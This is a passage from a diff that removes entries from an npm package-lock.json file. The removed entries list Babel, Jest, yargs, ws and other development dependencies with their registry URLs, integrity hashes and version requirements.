"https://registry.npmjs.org/walker/-/walker-1.0.8.tgz", - "integrity": "sha512-ts/8E8l5b7kY0vlWLewOkDXMmPdLcVV4GmOQLyxuSswIJsweeFZtAsMF7k1Nszz+TYBQrlYRmzOnr398y1JemQ==", - "dev": true, - "dependencies": { - "makeerror": "1.0.12" - } - }, - "node_modules/which": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", - "integrity": "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==", - "dev": true, - "dependencies": { - "isexe": "^2.0.0" - }, - "bin": { - "node-which": "bin/node-which" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/wrap-ansi": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", - "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", - "dev": true, - "dependencies": { - "ansi-styles": "^4.0.0", - "string-width": "^4.1.0", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/wrap-ansi?sponsor=1" - } - }, - "node_modules/wrappy": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", - "integrity": "sha1-tSQ9jz7BqjXxNkYFvA0QNuMKtp8=", - "dev": true - }, - "node_modules/write-file-atomic": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-4.0.2.tgz", - "integrity": "sha512-7KxauUdBmSdWnmpaGFg+ppNjKF8uNLry8LyzjauQDOVONfFLNKrKvQOxZ/VuTIcS/gge/YNahf5RIIQWTSarlg==", - "dev": true, - "dependencies": { - "imurmurhash": "^0.1.4", - "signal-exit": "^3.0.7" - }, - "engines": { - "node": "^12.13.0 || ^14.15.0 || >=16.0.0" - } - }, - "node_modules/ws": { - "version": "8.12.0", - "resolved": "https://registry.npmjs.org/ws/-/ws-8.12.0.tgz", - "integrity": "sha512-kU62emKIdKVeEIOIKVegvqpXMSTAMLJozpHZaJNDYqBjzlSYXQGviYwN1osDLJ9av68qHd4a2oSjd7yD4pacig==", - "dev": true, - "engines": { - "node": ">=10.0.0" - }, - "peerDependencies": { - "bufferutil": "^4.0.1", - "utf-8-validate": ">=5.0.2" - }, - "peerDependenciesMeta": { - "bufferutil": { - "optional": true - }, - "utf-8-validate": { - "optional": true - } - } - }, - "node_modules/y18n": { - "version": "5.0.8", - "resolved": "https://registry.npmjs.org/y18n/-/y18n-5.0.8.tgz", - "integrity": "sha512-0pfFzegeDWJHJIAmTLRP2DwHjdF5s7jo9tuztdQxAhINCdvS+3nGINqPd00AphqJR/0LhANUS6/+7SCb98YOfA==", - "dev": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", - "dev": true - }, - "node_modules/yargs": { - "version": "17.7.2", - "resolved": "https://registry.npmjs.org/yargs/-/yargs-17.7.2.tgz", - "integrity": "sha512-7dSzzRQ++CKnNI/krKnYRV7JKKPUXMEh61soaHKg9mrWEhzFWhFnxPxGl+69cD1Ou63C13NUPCnmIcrvqCuM6w==", - "dev": true, - "dependencies": { - "cliui": "^8.0.1", - "escalade": "^3.1.1", - "get-caller-file": "^2.0.5", - "require-directory": "^2.1.1", - "string-width": "^4.2.3", - "y18n": "^5.0.5", - "yargs-parser": "^21.1.1" - }, - "engines": { - "node": ">=12" - } - }, - "node_modules/yargs-parser": { - "version": "21.1.1", - "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-21.1.1.tgz", - "integrity": "sha512-tVpsJW7DdjecAiFpbIB1e3qxIQsE6NoPc5/eTdrbbIC4h0LVsWhnoa3g+m2HclBIujHzsxZ4VJVA+GUuc2/LBw==", - "dev": true, - "engines": { - "node": ">=12" - } - }, - "node_modules/yocto-queue": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/yocto-queue/-/yocto-queue-0.1.0.tgz", - "integrity": "sha512-rVksvsnNCdJ/ohGc6xgPwyN8eheCxsiLM8mxuE/t/mOVqJewPuO1miLpTHQiRgTKCLexL4MeAFVagts7HmNZ2Q==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - } - }, - "dependencies": { - "@ampproject/remapping": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/@ampproject/remapping/-/remapping-2.2.0.tgz", - "integrity": "sha512-qRmjj8nj9qmLTQXXmaR1cck3UXSRMPrbsLJAasZpF+t3riI71BXed5ebIOYwQntykeZuhjsdweEc9BxH5Jc26w==", - "dev": true, - "requires": { - "@jridgewell/gen-mapping": "^0.1.0", - "@jridgewell/trace-mapping": "^0.3.9" - } - }, - "@babel/code-frame": { - "version": "7.26.2", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.26.2.tgz", - "integrity": "sha512-RJlIHRueQgwWitWgF8OdFYGZX328Ax5BCemNGlqHfplnRT9ESi8JkFlvaVYbS+UubVY6dpv87Fs2u5M29iNFVQ==", - "dev": true, - "requires": { - "@babel/helper-validator-identifier": "^7.25.9", - "js-tokens": "^4.0.0", - "picocolors": "^1.0.0" - } - }, - "@babel/compat-data": { - "version": "7.26.2", - "resolved": "https://registry.npmjs.org/@babel/compat-data/-/compat-data-7.26.2.tgz", - "integrity": "sha512-Z0WgzSEa+aUcdiJuCIqgujCshpMWgUpgOxXotrYPSA53hA3qopNaqcJpyr0hVb1FeWdnqFA35/fUtXgBK8srQg==", - "dev": true - }, - "@babel/core": { - "version": "7.26.0", - "resolved": "https://registry.npmjs.org/@babel/core/-/core-7.26.0.tgz", - "integrity": "sha512-i1SLeK+DzNnQ3LL/CswPCa/E5u4lh1k6IAEphON8F+cXt0t9euTshDru0q7/IqMa1PMPz5RnHuHscF8/ZJsStg==", - "dev": true, - "requires": { - "@ampproject/remapping": "^2.2.0", - "@babel/code-frame": "^7.26.0", - "@babel/generator": "^7.26.0", - "@babel/helper-compilation-targets": "^7.25.9", - "@babel/helper-module-transforms": "^7.26.0", - "@babel/helpers": "^7.26.0", - "@babel/parser": "^7.26.0", - "@babel/template": "^7.25.9", - "@babel/traverse": "^7.25.9", - "@babel/types": "^7.26.0", - "convert-source-map": "^2.0.0", - "debug": "^4.1.0", - "gensync": "^1.0.0-beta.2", - "json5": "^2.2.3", - "semver": "^6.3.1" - } - }, - "@babel/generator": { - "version": "7.26.2", - "resolved": "https://registry.npmjs.org/@babel/generator/-/generator-7.26.2.tgz", - "integrity": "sha512-zevQbhbau95nkoxSq3f/DC/SC+EEOUZd3DYqfSkMhY2/wfSeaHV1Ew4vk8e+x8lja31IbyuUa2uQ3JONqKbysw==", - "dev": true, - "requires": { - "@babel/parser": "^7.26.2", - "@babel/types": "^7.26.0", - "@jridgewell/gen-mapping": "^0.3.5", - "@jridgewell/trace-mapping": "^0.3.25", - "jsesc": "^3.0.2" - }, - "dependencies": { - "@jridgewell/gen-mapping": { - "version": "0.3.5", - "resolved": "https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.3.5.tgz", - "integrity": "sha512-IzL8ZoEDIBRWEzlCcRhOaCupYyN5gdIK+Q6fbFdPDg6HqX6jpkItn7DFIpW9LQzXG6Df9sA7+OKnq0qlz/GaQg==", - "dev": true, - "requires": { - "@jridgewell/set-array": "^1.2.1", - "@jridgewell/sourcemap-codec": "^1.4.10", - "@jridgewell/trace-mapping": "^0.3.24" - } - } - } - }, - "@babel/helper-compilation-targets": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-compilation-targets/-/helper-compilation-targets-7.25.9.tgz", - "integrity": "sha512-j9Db8Suy6yV/VHa4qzrj9yZfZxhLWQdVnRlXxmKLYlhWUVB1sB2G5sxuWYXk/whHD9iW76PmNzxZ4UCnTQTVEQ==", - "dev": true, - "requires": { - "@babel/compat-data": "^7.25.9", - "@babel/helper-validator-option": "^7.25.9", - "browserslist": "^4.24.0", - "lru-cache": "^5.1.1", - "semver": "^6.3.1" - }, - "dependencies": { - "lru-cache": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-5.1.1.tgz", - "integrity": "sha512-KpNARQA3Iwv+jTA0utUVVbrh+Jlrr1Fv0e56GGzAFOXN7dk/FviaDW8LHmK52DlcH4WP2n6gI8vN1aesBFgo9w==", - "dev": true, - "requires": { - "yallist": "^3.0.2" - } - }, - "yallist": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-3.1.1.tgz", - "integrity": "sha512-a4UGQaWPH59mOXUYnAG2ewncQS4i4F43Tv3JoAM+s2VDAmS9NsK8GpDMLrCHPksFT7h3K6TOoUNn2pb7RoXx4g==", - "dev": true - } - } - }, - "@babel/helper-module-imports": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-module-imports/-/helper-module-imports-7.25.9.tgz", - "integrity": "sha512-tnUA4RsrmflIM6W6RFTLFSXITtl0wKjgpnLgXyowocVPrbYrLUXSBXDgTs8BlbmIzIdlBySRQjINYs2BAkiLtw==", - "dev": true, - "requires": { - "@babel/traverse": "^7.25.9", - "@babel/types": "^7.25.9" - } - }, - "@babel/helper-module-transforms": { - "version": "7.26.0", - "resolved": "https://registry.npmjs.org/@babel/helper-module-transforms/-/helper-module-transforms-7.26.0.tgz", - "integrity": "sha512-xO+xu6B5K2czEnQye6BHA7DolFFmS3LB7stHZFaOLb1pAwO1HWLS8fXA+eh0A2yIvltPVmx3eNNDBJA2SLHXFw==", - "dev": true, - "requires": { - "@babel/helper-module-imports": "^7.25.9", - "@babel/helper-validator-identifier": "^7.25.9", - "@babel/traverse": "^7.25.9" - } - }, - "@babel/helper-plugin-utils": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-plugin-utils/-/helper-plugin-utils-7.25.9.tgz", - "integrity": "sha512-kSMlyUVdWe25rEsRGviIgOWnoT/nfABVWlqt9N19/dIPWViAOW2s9wznP5tURbs/IDuNk4gPy3YdYRgH3uxhBw==", - "dev": true - }, - "@babel/helper-string-parser": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-string-parser/-/helper-string-parser-7.25.9.tgz", - "integrity": "sha512-4A/SCr/2KLd5jrtOMFzaKjVtAei3+2r/NChoBNoZ3EyP/+GlhoaEGoWOZUmFmoITP7zOJyHIMm+DYRd8o3PvHA==", - "dev": true - }, - "@babel/helper-validator-identifier": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.25.9.tgz", - "integrity": "sha512-Ed61U6XJc3CVRfkERJWDz4dJwKe7iLmmJsbOGu9wSloNSFttHV0I8g6UAgb7qnK5ly5bGLPd4oXZlxCdANBOWQ==", - "dev": true - }, - "@babel/helper-validator-option": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-option/-/helper-validator-option-7.25.9.tgz", - "integrity": "sha512-e/zv1co8pp55dNdEcCynfj9X7nyUKUXoUEwfXqaZt0omVOmDe9oOTdKStH4GmAw6zxMFs50ZayuMfHDKlO7Tfw==", - "dev": true - }, - "@babel/helpers": { - "version": "7.26.0", - "resolved": "https://registry.npmjs.org/@babel/helpers/-/helpers-7.26.0.tgz", - "integrity": "sha512-tbhNuIxNcVb21pInl3ZSjksLCvgdZy9KwJ8brv993QtIVKJBBkYXz4q4ZbAv31GdnC+R90np23L5FbEBlthAEw==", - "dev": true, - "requires": { - "@babel/template": "^7.25.9", - "@babel/types": "^7.26.0" - } - }, - "@babel/parser": { - "version": "7.26.2", - "resolved": "https://registry.npmjs.org/@babel/parser/-/parser-7.26.2.tgz", - "integrity": "sha512-DWMCZH9WA4Maitz2q21SRKHo9QXZxkDsbNZoVD62gusNtNBBqDg9i7uOhASfTfIGNzW+O+r7+jAlM8dwphcJKQ==", - "dev": true, - "requires": { - "@babel/types": "^7.26.0" - } - }, - "@babel/plugin-syntax-async-generators": { - "version": "7.8.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-async-generators/-/plugin-syntax-async-generators-7.8.4.tgz", - "integrity": "sha512-tycmZxkGfZaxhMRbXlPXuVFpdWlXpir2W4AMhSJgRKzk/eDlIXOhb2LHWoLpDF7TEHylV5zNhykX6KAgHJmTNw==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-bigint": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-bigint/-/plugin-syntax-bigint-7.8.3.tgz", - "integrity": "sha512-wnTnFlG+YxQm3vDxpGE57Pj0srRU4sHE/mDkt1qv2YJJSeUAec2ma4WLUnUPeKjyrfntVwe/N6dCXpU+zL3Npg==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-class-properties": { - "version": "7.12.13", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-class-properties/-/plugin-syntax-class-properties-7.12.13.tgz", - "integrity": "sha512-fm4idjKla0YahUNgFNLCB0qySdsoPiZP3iQE3rky0mBUtMZ23yDJ9SJdg6dXTSDnulOVqiF3Hgr9nbXvXTQZYA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.12.13" - } - }, - "@babel/plugin-syntax-import-meta": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-import-meta/-/plugin-syntax-import-meta-7.10.4.tgz", - "integrity": "sha512-Yqfm+XDx0+Prh3VSeEQCPU81yC+JWZ2pDPFSS4ZdpfZhp4MkFMaDC1UqseovEKwSUpnIL7+vK+Clp7bfh0iD7g==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.10.4" - } - }, - "@babel/plugin-syntax-json-strings": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-json-strings/-/plugin-syntax-json-strings-7.8.3.tgz", - "integrity": "sha512-lY6kdGpWHvjoe2vk4WrAapEuBR69EMxZl+RoGRhrFGNYVK8mOPAW8VfbT/ZgrFbXlDNiiaxQnAtgVCZ6jv30EA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-jsx": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-jsx/-/plugin-syntax-jsx-7.25.9.tgz", - "integrity": "sha512-ld6oezHQMZsZfp6pWtbjaNDF2tiiCYYDqQszHt5VV437lewP9aSi2Of99CK0D0XB21k7FLgnLcmQKyKzynfeAA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.25.9" - } - }, - "@babel/plugin-syntax-logical-assignment-operators": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-logical-assignment-operators/-/plugin-syntax-logical-assignment-operators-7.10.4.tgz", - "integrity": "sha512-d8waShlpFDinQ5MtvGU9xDAOzKH47+FFoney2baFIoMr952hKOLp1HR7VszoZvOsV/4+RRszNY7D17ba0te0ig==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.10.4" - } - }, - "@babel/plugin-syntax-nullish-coalescing-operator": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-nullish-coalescing-operator/-/plugin-syntax-nullish-coalescing-operator-7.8.3.tgz", - "integrity": "sha512-aSff4zPII1u2QD7y+F8oDsz19ew4IGEJg9SVW+bqwpwtfFleiQDMdzA/R+UlWDzfnHFCxxleFT0PMIrR36XLNQ==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-numeric-separator": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-numeric-separator/-/plugin-syntax-numeric-separator-7.10.4.tgz", - "integrity": "sha512-9H6YdfkcK/uOnY/K7/aA2xpzaAgkQn37yzWUMRK7OaPOqOpGS1+n0H5hxT9AUw9EsSjPW8SVyMJwYRtWs3X3ug==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.10.4" - } - }, - "@babel/plugin-syntax-object-rest-spread": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-object-rest-spread/-/plugin-syntax-object-rest-spread-7.8.3.tgz", - "integrity": "sha512-XoqMijGZb9y3y2XskN+P1wUGiVwWZ5JmoDRwx5+3GmEplNyVM2s2Dg8ILFQm8rWM48orGy5YpI5Bl8U1y7ydlA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-optional-catch-binding": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-catch-binding/-/plugin-syntax-optional-catch-binding-7.8.3.tgz", - "integrity": "sha512-6VPD0Pc1lpTqw0aKoeRTMiB+kWhAoT24PA+ksWSBrFtl5SIRVpZlwN3NNPQjehA2E/91FV3RjLWoVTglWcSV3Q==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-optional-chaining": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-chaining/-/plugin-syntax-optional-chaining-7.8.3.tgz", - "integrity": "sha512-KoK9ErH1MBlCPxV0VANkXW2/dw4vlbGDrFgz8bmUsBGYkFRcbRwMh6cIJubdPrkxRwuGdtCk0v/wPTKbQgBjkg==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-top-level-await": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-top-level-await/-/plugin-syntax-top-level-await-7.14.5.tgz", - "integrity": "sha512-hx++upLv5U1rgYfwe1xBQUhRmU41NEvpUvrp8jkrSCdvGSnM5/qdRMtylJ6PG5OFkBaHkbTAKTnd3/YyESRHFw==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.14.5" - } - }, - "@babel/plugin-syntax-typescript": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-typescript/-/plugin-syntax-typescript-7.25.9.tgz", - "integrity": "sha512-hjMgRy5hb8uJJjUcdWunWVcoi9bGpJp8p5Ol1229PoN6aytsLwNMgmdftO23wnCLMfVmTwZDWMPNq/D1SY60JQ==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.25.9" - } - }, - "@babel/template": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/template/-/template-7.25.9.tgz", - "integrity": "sha512-9DGttpmPvIxBb/2uwpVo3dqJ+O6RooAFOS+lB+xDqoE2PVCE8nfoHMdZLpfCQRLwvohzXISPZcgxt80xLfsuwg==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.25.9", - "@babel/parser": "^7.25.9", - "@babel/types": "^7.25.9" - } - }, - "@babel/traverse": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/traverse/-/traverse-7.25.9.tgz", - "integrity": "sha512-ZCuvfwOwlz/bawvAuvcj8rrithP2/N55Tzz342AkTvq4qaWbGfmCk/tKhNaV2cthijKrPAA8SRJV5WWe7IBMJw==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.25.9", - "@babel/generator": "^7.25.9", - "@babel/parser": "^7.25.9", - "@babel/template": "^7.25.9", - "@babel/types": "^7.25.9", - "debug": "^4.3.1", - "globals": "^11.1.0" - } - }, - "@babel/types": { - "version": "7.26.0", - "resolved": "https://registry.npmjs.org/@babel/types/-/types-7.26.0.tgz", - "integrity": "sha512-Z/yiTPj+lDVnF7lWeKCIJzaIkI0vYO87dMpZ4bg4TDrFe4XXLFWL1TbXU27gBP3QccxV9mZICCrnjnYlJjXHOA==", - "dev": true, - "requires": { - "@babel/helper-string-parser": "^7.25.9", - "@babel/helper-validator-identifier": "^7.25.9" - } - }, - "@bcoe/v8-coverage": { - "version": "0.2.3", - "resolved": "https://registry.npmjs.org/@bcoe/v8-coverage/-/v8-coverage-0.2.3.tgz", - "integrity": "sha512-0hYQ8SB4Db5zvZB4axdMHGwEaQjkZzFjQiN9LVYvIFB2nSUHW9tYpxWriPrWDASIxiaXax83REcLxuSdnGPZtw==", - "dev": true - }, - "@istanbuljs/load-nyc-config": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/@istanbuljs/load-nyc-config/-/load-nyc-config-1.1.0.tgz", - "integrity": "sha512-VjeHSlIzpv/NyD3N0YuHfXOPDIixcA1q2ZV98wsMqcYlPmv2n3Yb2lYP9XMElnaFVXg5A7YLTeLu6V84uQDjmQ==", - "dev": true, - "requires": { - "camelcase": "^5.3.1", - "find-up": "^4.1.0", - "get-package-type": "^0.1.0", - "js-yaml": "^3.13.1", - "resolve-from": "^5.0.0" - } - }, - "@istanbuljs/schema": { - "version": "0.1.3", - "resolved": "https://registry.npmjs.org/@istanbuljs/schema/-/schema-0.1.3.tgz", - "integrity": "sha512-ZXRY4jNvVgSVQ8DL3LTcakaAtXwTVUxE81hslsyD2AtoXW/wVob10HkOJ1X/pAlcI7D+2YoZKg5do8G/w6RYgA==", - "dev": true - }, - "@jest/console": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/console/-/console-29.7.0.tgz", - "integrity": "sha512-5Ni4CU7XHQi32IJ398EEP4RrB8eV09sXP2ROqD4bksHrnTree52PsxvX8tpL8LvTZ3pFzXyPbNQReSN41CAhOg==", - "dev": true, - "requires": { - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "jest-message-util": "^29.7.0", - "jest-util": "^29.7.0", - "slash": "^3.0.0" - } - }, - "@jest/core": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/core/-/core-29.7.0.tgz", - "integrity": "sha512-n7aeXWKMnGtDA48y8TLWJPJmLmmZ642Ceo78cYWEpiD7FzDgmNDV/GCVRorPABdXLJZ/9wzzgZAlHjXjxDHGsg==", - "dev": true, - "requires": { - "@jest/console": "^29.7.0", - "@jest/reporters": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "jest-changed-files": "^29.7.0", - "jest-config": "^29.7.0", - "jest-haste-map": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-regex-util": "^29.6.3", - "jest-resolve": "^29.7.0", - "jest-resolve-dependencies": "^29.7.0", - "jest-runner": "^29.7.0", - "jest-runtime": "^29.7.0", - "jest-snapshot": "^29.7.0", - "jest-util": "^29.7.0", - "jest-validate": "^29.7.0", - "jest-watcher": "^29.7.0", - "micromatch": "^4.0.4", - "pretty-format": "^29.7.0", - "slash": "^3.0.0", - "strip-ansi": "^6.0.0" - } - }, - "@jest/environment": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/environment/-/environment-29.7.0.tgz", - "integrity": "sha512-aQIfHDq33ExsN4jP1NWGXhxgQ/wixs60gDiKO+XVMd8Mn0NWPWgc34ZQDTb2jKaUWQ7MuwoitXAsN2XVXNMpAw==", - "dev": true, - "requires": { - "@jest/fake-timers": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "jest-mock": "^29.7.0" - } - }, - "@jest/expect": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/expect/-/expect-29.7.0.tgz", - "integrity": "sha512-8uMeAMycttpva3P1lBHB8VciS9V0XAr3GymPpipdyQXbBcuhkLQOSe8E/p92RyAdToS6ZD1tFkX+CkhoECE0dQ==", - "dev": true, - "requires": { - "expect": "^29.7.0", - "jest-snapshot": "^29.7.0" - } - }, - "@jest/expect-utils": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-29.7.0.tgz", - "integrity": "sha512-GlsNBWiFQFCVi9QVSx7f5AgMeLxe9YCCs5PuP2O2LdjDAA8Jh9eX7lA1Jq/xdXw3Wb3hyvlFNfZIfcRetSzYcA==", - "dev": true, - "requires": { - "jest-get-type": "^29.6.3" - } - }, - "@jest/fake-timers": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/fake-timers/-/fake-timers-29.7.0.tgz", - "integrity": "sha512-q4DH1Ha4TTFPdxLsqDXK1d3+ioSL7yL5oCMJZgDYm6i+6CygW5E5xVr/D1HdsGxjt1ZWSfUAs9OxSB/BNelWrQ==", - "dev": true, - "requires": { - "@jest/types": "^29.6.3", - "@sinonjs/fake-timers": "^10.0.2", - "@types/node": "*", - "jest-message-util": "^29.7.0", - "jest-mock": "^29.7.0", - "jest-util": "^29.7.0" - } - }, - "@jest/globals": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/globals/-/globals-29.7.0.tgz", - "integrity": "sha512-mpiz3dutLbkW2MNFubUGUEVLkTGiqW6yLVTA+JbP6fI6J5iL9Y0Nlg8k95pcF8ctKwCS7WVxteBs29hhfAotzQ==", - "dev": true, - "requires": { - "@jest/environment": "^29.7.0", - "@jest/expect": "^29.7.0", - "@jest/types": "^29.6.3", - "jest-mock": "^29.7.0" - } - }, - "@jest/reporters": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/reporters/-/reporters-29.7.0.tgz", - "integrity": "sha512-DApq0KJbJOEzAFYjHADNNxAE3KbhxQB1y5Kplb5Waqw6zVbuWatSnMjE5gs8FUgEPmNsnZA3NCWl9NG0ia04Pg==", - "dev": true, - "requires": { - "@bcoe/v8-coverage": "^0.2.3", - "@jest/console": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "@jridgewell/trace-mapping": "^0.3.18", - "@types/node": "*", - "chalk": "^4.0.0", - "collect-v8-coverage": "^1.0.0", - "exit": "^0.1.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "istanbul-lib-coverage": "^3.0.0", - "istanbul-lib-instrument": "^6.0.0", - "istanbul-lib-report": "^3.0.0", - "istanbul-lib-source-maps": "^4.0.0", - "istanbul-reports": "^3.1.3", - "jest-message-util": "^29.7.0", - "jest-util": "^29.7.0", - "jest-worker": "^29.7.0", - "slash": "^3.0.0", - "string-length": "^4.0.1", - "strip-ansi": "^6.0.0", - "v8-to-istanbul": "^9.0.1" - }, - "dependencies": { - "istanbul-lib-instrument": { - "version": "6.0.3", - "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-6.0.3.tgz", - "integrity": "sha512-Vtgk7L/R2JHyyGW07spoFlB8/lpjiOLTjMdms6AFMraYt3BaJauod/NGrfnVG/y4Ix1JEuMRPDPEj2ua+zz1/Q==", - "dev": true, - "requires": { - "@babel/core": "^7.23.9", - "@babel/parser": "^7.23.9", - "@istanbuljs/schema": "^0.1.3", - "istanbul-lib-coverage": "^3.2.0", - "semver": "^7.5.4" - } - }, - "semver": { - "version": "7.6.3", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", - "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", - "dev": true - } - } - }, - "@jest/schemas": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-29.6.3.tgz", - "integrity": "sha512-mo5j5X+jIZmJQveBKeS/clAueipV7KgiX1vMgCxam1RNYiqE1w62n0/tJJnHtjW8ZHcQco5gY85jA3mi0L+nSA==", - "dev": true, - "requires": { - "@sinclair/typebox": "^0.27.8" - } - }, - "@jest/source-map": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/@jest/source-map/-/source-map-29.6.3.tgz", - "integrity": "sha512-MHjT95QuipcPrpLM+8JMSzFx6eHp5Bm+4XeFDJlwsvVBjmKNiIAvasGK2fxz2WbGRlnvqehFbh07MMa7n3YJnw==", - "dev": true, - "requires": { - "@jridgewell/trace-mapping": "^0.3.18", - "callsites": "^3.0.0", - "graceful-fs": "^4.2.9" - } - }, - "@jest/test-result": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/test-result/-/test-result-29.7.0.tgz", - "integrity": "sha512-Fdx+tv6x1zlkJPcWXmMDAG2HBnaR9XPSd5aDWQVsfrZmLVT3lU1cwyxLgRmXR9yrq4NBoEm9BMsfgFzTQAbJYA==", - "dev": true, - "requires": { - "@jest/console": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/istanbul-lib-coverage": "^2.0.0", - "collect-v8-coverage": "^1.0.0" - } - }, - "@jest/test-sequencer": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/@jest/test-sequencer/-/test-sequencer-29.7.0.tgz", - "integrity": "sha512-GQwJ5WZVrKnOJuiYiAF52UNUJXgTZx1NHjFSEB0qEMmSZKAkdMoIzw/Cj6x6NF4AvV23AUqDpFzQkN/eYCYTxw==", - "dev": true, - "requires": { - "@jest/test-result": "^29.7.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.7.0", - "slash": "^3.0.0" - } - }, - "@jest/transform": { - "version": "29.7.0", - 